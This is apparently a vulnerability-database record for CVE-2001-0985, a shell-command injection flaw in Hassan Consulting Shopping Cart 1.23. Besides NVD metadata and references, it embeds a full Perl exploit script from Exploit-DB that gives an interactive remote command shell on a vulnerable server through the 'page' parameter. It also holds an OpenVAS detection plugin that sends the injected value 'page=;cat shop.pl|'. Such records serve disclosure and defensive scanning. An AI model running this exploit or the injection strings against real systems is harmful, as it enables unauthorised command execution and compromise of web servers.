ID CVE-2001-0985Type cveReporter cve@mitre.orgModified 2017-12-19T02:29:00
Description
shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the "page" parameter.
{"id": "CVE-2001-0985", "bulletinFamily": "NVD", "title": "CVE-2001-0985", "description": "shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the \"page\" parameter.", "published": "2001-09-08T04:00:00", "modified": "2017-12-19T02:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0985", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/3308", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7106", "http://www.irata.com/shopver.html", "http://www.securityfocus.com/archive/1/212827"], "cvelist": ["CVE-2001-0985"], "type": "cve", "lastseen": "2019-05-29T18:07:38", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "19b61abcef977743bb3fe4664ef1fe92"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "26f9b5929e84677d0cf3f76b9bb79d31"}, {"key": "cpe23", "hash": "6c7541e98a1fadd0cb5664876939df3d"}, {"key": "cvelist", "hash": "019d96ea584658777a86591ae36113ab"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "27c7580c75f8189a2ddd31c96c2f7e2b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "cf3fc0f4d0304e01ae517115c5920d78"}, {"key": "href", "hash": "73b5538cc4829a27b9f000d077f385da"}, {"key": "modified", "hash": "5735d9c13cfbd331fe56a3c91e78e26d"}, {"key": "published", "hash": "d53f2707f11bae55a28b08f419deed86"}, {"key": "references", "hash": "eeab2e4c69d4fd46da778337c348bb14"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "55d448f4a1e8d71f2420503afbbe5821"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "264a386bc26657c7529e8c851bb94222eecd62d659cd3430dd1bad03b552e0e3", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:635"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231010764"]}, {"type": "exploitdb", "idList": ["EDB-ID:21104"]}], "modified": "2019-05-29T18:07:38"}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-05-29T18:07:38"}, "vulnersScore": 7.9}, "objectVersion": "1.3", "cpe": ["cpe:/a:hassan_consulting:shopping_cart:1.23"], "affectedSoftware": [{"name": "hassan_consulting shopping_cart", "operator": "eq", "version": "1.23"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:hassan_consulting:shopping_cart:1.23:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-02-02T15:40:57", "bulletinFamily": "exploit", "description": "Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability. CVE-2001-0985. Remote exploit for cgi platform", "modified": "2001-09-08T00:00:00", "published": "2001-09-08T00:00:00", "id": "EDB-ID:21104", "href": "https://www.exploit-db.com/exploits/21104/", "type": "exploitdb", "title": "Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/3308/info\r\n\r\nHassan Consulting's Shopping Cart is commercial web store software.\r\n\r\nShopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a request which causes arbitrary commands to be executed on the host (with the privileges of the webserver process). For example, special shell characters like \"|\" or \";\" are treated as valid by Shopping Cart.\r\n\r\n\r\n#####################################################\r\n# Shopcart exploit\r\n# Spawn bash style Shell with webserver uid\r\n#\r\n# Spabam 2003 PRIV8 code\r\n# #hackarena irc.brasnet.org\r\n# This Script is currently under development\r\n#####################################################\r\nuse strict;\r\nuse IO::Socket;\r\nmy $host;\r\nmy $port;\r\nmy $command;\r\nmy $url;\r\nmy @results;\r\nmy $probe;\r\nmy @U;\r\nmy $shit;\r\n$U[1] = \"/cgi-local/shop.pl/page=;\";\r\n&intro;\r\n&scan;\r\n&choose;\r\n&command;\r\n&exit;\r\nsub intro {\r\n&help;\r\n&host;\r\n&server;\r\nsleep 3;\r\n};\r\nsub host {\r\nprint \"\\nHost or IP : \";\r\n$host=<STDIN>;\r\nchomp $host;\r\nif ($host eq \"\"){$host=\"127.0.0.1\"};\r\n$shit=\"|\";\r\n$port=\"80\";\r\nchomp $port;\r\nif ($port =~/\\D/ ){$port=\"80\"};\r\nif ($port eq \"\" ) {$port = \"80\"};\r\n};\r\nsub server {\r\nmy $X;\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n$probe = \"string\";\r\nmy $output;\r\nmy $webserver = \"something\";\r\n&connect;\r\nfor ($X=0; $X<=10; $X++){\r\n\t$output = $results[$X];\r\n\tif (defined $output){\r\n\tif ($output =~/Apache/){ $webserver = \"Apache\" };\r\n\t};\r\n};\r\nif ($webserver ne \"Apache\"){\r\nmy $choice = \"y\";\r\nchomp $choice;\r\nif ($choice =~/N/i) {&exit};\r\n }else{\r\nprint \"\\n\\nOK\";\r\n\t};\t\t\r\n}; \r\nsub scan {\r\nmy $status = \"not_vulnerable\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nmy $loop;\r\nmy $output;\r\nmy $flag;\r\n$command=\"dir\";\r\nfor ($loop=1; $loop < @U; $loop++) { \r\n$flag = \"0\";\r\n$url = $U[$loop];\r\n$probe = \"scan\";\r\n&connect;\r\nforeach $output (@results){\r\nif ($output =~ /Directory/) {\r\n $flag = \"1\";\r\n\t\t\t $status = \"vulnerable\";\r\n\t\t\t };\r\n\t};\r\nif ($flag eq \"0\") { \r\n}else{\r\n };\r\n};\r\nif ($status eq \"not_vulnerable\"){\r\n\r\n\t\t\t\t};\r\n};\r\nsub choose {\r\nmy $choice=\"0\";\r\nchomp $choice;\r\nif ($choice > @U){ &choose };\r\nif ($choice =~/\\D/g ){ &choose };\r\nif ($choice == 0){ &other };\r\n$url = $U[$choice];\r\n};\r\nsub other {\r\nmy $other = \"/cgi-local/shop.pl/page=;\";\r\nchomp $other;\r\n$U[0] = $other;\r\n};\r\nsub command {\r\nwhile ($command !~/quit/i) {\r\nprint \"\\n[$host]\\$ \";\r\n$command = <STDIN>;\r\nchomp $command;\r\nif ($command =~/quit/i) { &exit };\r\nif ($command =~/url/i) { &choose }; \r\nif ($command =~/scan/i) { &scan };\r\nif ($command =~/help/i) { &help };\r\n$command =~ s/\\s/+/g; \r\n$probe = \"command\";\r\nif ($command !~/quit|url|scan|help/) {&connect};\r\n};\r\n&exit;\r\n}; \r\nsub connect {\r\nmy $connection = IO::Socket::INET->new (\r\n\t\t\t\tProto => \"tcp\",\r\n\t\t\t\tPeerAddr => \"$host\",\r\n\t\t\t\tPeerPort => \"$port\",\r\n\t\t\t\t) or die \"\\nSorry UNABLE TO CONNECT To $host On Port $port.\\n\";\r\n$connection -> autoflush(1);\r\nif ($probe =~/command|scan/){\r\nprint $connection \"GET $url$command$shit HTTP/1.0\\r\\n\\r\\n\";\r\n}elsif ($probe =~/string/) {\r\nprint $connection \"HEAD / HTTP/1.0\\r\\n\\r\\n\";\r\n};\r\n\r\nwhile ( <$connection> ) { \r\n\t\t\t@results = <$connection>;\r\n\t\t\t };\r\nclose $connection;\r\nif ($probe eq \"command\"){ &output };\r\nif ($probe eq \"string\"){ &output };\r\n}; \r\nsub output{\r\nmy $display;\r\nif ($probe eq \"string\") {\r\n\t\t\tmy $X;\r\n\t\t\tfor ($X=0; $X<=10; $X++) {\r\n\t\t\t$display = $results[$X];\r\n\t\t\tif (defined $display){print \"$display\";};\r\n\t\t\tsleep 1;\r\n\t\t\t\t};\r\n\t\t\t}else{\r\n\t\t\tforeach $display (@results){\r\n\t\t\t print \"$display\";\r\n\t\t\t sleep 1;\r\n\t\t\t\t};\r\n };\r\n}; \r\nsub exit{\r\nprint \"\\n\\n\\n\r\nSPABAM 2003.\";\r\nprint \"\\n\\n\\n\";\r\nexit;\r\n};\r\nsub help {\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nprint \"\\n\r\n ShopCart.pl v1.5 by SPABAM 2003\";\r\nprint \"\\n\r\n\";\r\nprint \"\\n Hassan Consulting's Shopping Cart Version 1.18 Exploit\";\r\nprint \"\\n \r\n\r\n(this version is unstable. Require %20 instead space)\r\nnote.. web directory is normally /var/www/html\";\r\nprint \"\\n\";\r\nprint \"\\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n};\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21104/"}], "openvas": [{"lastseen": "2019-05-29T18:32:00", "bulletinFamily": "scanner", "description": "We detected the presence of the Shopping Cart\n CGI (Hassan). A security problem in this CGI allows execution of arbitrary commands.", "modified": "2019-04-26T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010764", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010764", "title": "Shopping Cart Arbitrary Command Execution (Hassan)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Shopping Cart Arbitrary Command Execution (Hassan)\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10764\");\n script_version(\"2019-04-26T10:38:05+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 10:38:05 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3308);\n script_cve_id(\"CVE-2001-0985\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Shopping Cart Arbitrary Command Execution (Hassan)\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/unixfocus/5QP072K5FK.html\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.50 or later.\");\n\n script_tag(name:\"summary\", value:\"We detected the presence of the Shopping Cart\n CGI (Hassan). A security problem in this CGI allows execution of arbitrary commands.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" )\n dir = \"\";\n\n url = string( dir, \"/shop.pl/page=;cat%20shop.pl|\" );\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n\n if( egrep( pattern:\"^#!/.*/perl\", string:buf ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[CVE-2001-0985](https://vulners.com/cve/CVE-2001-0985)\nBugtraq ID: 3308\n", "modified": "2001-09-08T00:00:00", "published": "2001-09-08T00:00:00", "id": "OSVDB:635", "href": "https://vulners.com/osvdb/OSVDB:635", "title": "Hassan Consulting shop.pl page Parameter Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
